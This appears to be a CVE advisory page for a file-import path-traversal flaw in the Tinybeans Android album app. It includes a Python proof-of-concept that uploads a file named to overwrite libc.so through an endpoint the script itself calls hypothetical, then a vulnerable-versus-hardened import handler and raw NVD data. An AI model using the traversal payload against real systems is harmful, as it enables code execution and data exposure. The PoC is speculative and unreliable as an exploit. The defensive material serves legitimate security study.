Security Vulnerability Report
CVE-2026-30289 CVSS 8.4 HIGH

Published: 2026-04-01 14:16:50
Last Modified: 2026-04-02 19:40:07

Description

An arbitrary file overwrite vulnerability in Tinybeans Private Family Album App v5.9.5-prod allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-73 (External Control of File Name or Path)

Configurations (Affected Products)

cpe:2.3:a:tinybeans:private_family_album:5.9.5:*:*:*:*:android:*:* - VULNERABLE
Tinybeans Private Family Album App <= 5.9.5-prod

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the advisory's CVSS vector is AV:L (local) and the HTTP import endpoint used below is marked hypothetical by the script itself; it illustrates the shape of the attack (a traversal path supplied as the imported file name), not a verified remote entry point.

```python
# Proof of Concept for CVE-2026-30289
# This script simulates the arbitrary file overwrite vulnerability.
import sys
import requests


def exploit(target_ip, malicious_file_path):
    # The endpoint responsible for file import (hypothetical)
    url = f"http://{target_ip}/api/import"
    # Craft the payload to overwrite a critical file (e.g., library or config)
    # Using path traversal to escape the sandbox
    with open(malicious_file_path, "rb") as payload:
        files = {
            "file": (
                "../../../../../system/lib/libc.so",
                payload,
                "application/octet-stream",
            )
        }
        try:
            print(f"[+] Sending malicious file to {url}...")
            response = requests.post(url, files=files)
            if response.status_code == 200:
                print("[+] Exploit successful! File overwritten.")
            else:
                print(f"[-] Exploit failed. Status code: {response.status_code}")
        except Exception as e:
            print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Usage: python poc.py <target_ip> <local_malicious_file>
    # Example payload could be a shellcode or modified config
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    payload_path = sys.argv[2] if len(sys.argv) > 2 else "payload.bin"
    exploit(target, payload_path)
```
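The advisory classifies the flaw as CWE-73: a file name taken from the import input is used, unchecked, as the write destination. The following added example (written for this page, not code from the advisory or from the Tinybeans app) shows that pattern in a minimal import handler beside a hardened version that resolves the destination and requires it to stay inside the app's data directory. Function names, the directory layout and the traversal payload are all constructed for the demonstration.

```python
# Added example: CWE-73 file-import handler, vulnerable form beside hardened form.
# Not part of the CVE-2026-30289 advisory or the Tinybeans code base.
import os
import tempfile


def vulnerable_import(data_dir, imported_name, content):
    """Write content to data_dir/imported_name, trusting the supplied name.
    A name such as '../../critical.cfg' escapes data_dir (the CWE-73 pattern)."""
    dest = os.path.join(data_dir, imported_name)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(content)
    return os.path.realpath(dest)


def safe_import(data_dir, imported_name, content):
    """Same operation, but the resolved destination must stay under data_dir.
    Relative sub-paths (albums/photo.jpg) are allowed; '..' segments, absolute
    paths and symlink escapes are rejected after realpath resolution."""
    root = os.path.realpath(data_dir)
    if os.path.isabs(imported_name):
        raise ValueError("absolute import paths are not allowed")
    dest = os.path.realpath(os.path.join(root, imported_name))
    # Containment check on the resolved path, not on the raw string: this
    # catches '..' and symlinks alike, since realpath has already followed them.
    if dest == root or os.path.commonpath([root, dest]) != root:
        raise ValueError(f"import destination escapes data directory: {imported_name}")
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(content)
    return dest


def demo():
    """Run both importers against a constructed directory layout and report
    where each one wrote. Layout: <tmp>/app/files is the app data directory."""
    base = tempfile.mkdtemp()
    data_dir = os.path.join(base, "app", "files")
    os.makedirs(data_dir)
    root = os.path.realpath(data_dir)
    payload = b"overwritten"
    traversal = "../../critical.cfg"  # constructed payload: escapes files/ and app/

    escaped = vulnerable_import(data_dir, traversal, payload)
    vulnerable_escaped = os.path.commonpath([root, escaped]) != root

    try:
        safe_import(data_dir, traversal, payload)
        safe_blocked = False
    except ValueError:
        safe_blocked = True

    try:
        safe_import(data_dir, os.path.join(base, "abs.cfg"), payload)
        abs_blocked = False
    except ValueError:
        abs_blocked = True

    legit = safe_import(data_dir, "albums/photo.jpg", b"jpegdata")
    return {
        "vulnerable_wrote": escaped,
        "vulnerable_escaped": vulnerable_escaped,
        "safe_blocked": safe_blocked,
        "abs_blocked": abs_blocked,
        "safe_wrote": legit,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The containment test is done on the realpath-resolved destination rather than by scanning the input string for `..`, because URL-encoded or Unicode variants of a traversal sequence, and symlinks already present in the data directory, both defeat string matching but not resolution.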

References

https://github.com/Secsys-FDU/AF_CVEs/issues/17 (Exploit, Third Party Advisory)
https://play.google.com/store/apps/details?id=com.tinybeans (Product)
https://secsys.fudan.edu.cn/ (Not Applicable)
https://tinybeans.com/ (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30289", "sourceIdentifier": "[email protected]", "published": "2026-04-01T14:16:49.910", "lastModified": "2026-04-02T19:40:06.643", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in Tinybeans Private Family Album App v5.9.5-prod allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tinybeans:private_family_album:5.9.5:*:*:*:*:android:*:*", "matchCriteriaId": "4A78A0FE-9D92-4176-BB2A-95C70C22F84D"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/17", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://play.google.com/store/apps/details?id=com.tinybeans", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://tinybeans.com/", "source": "[email protected]", "tags": ["Product"]}]}}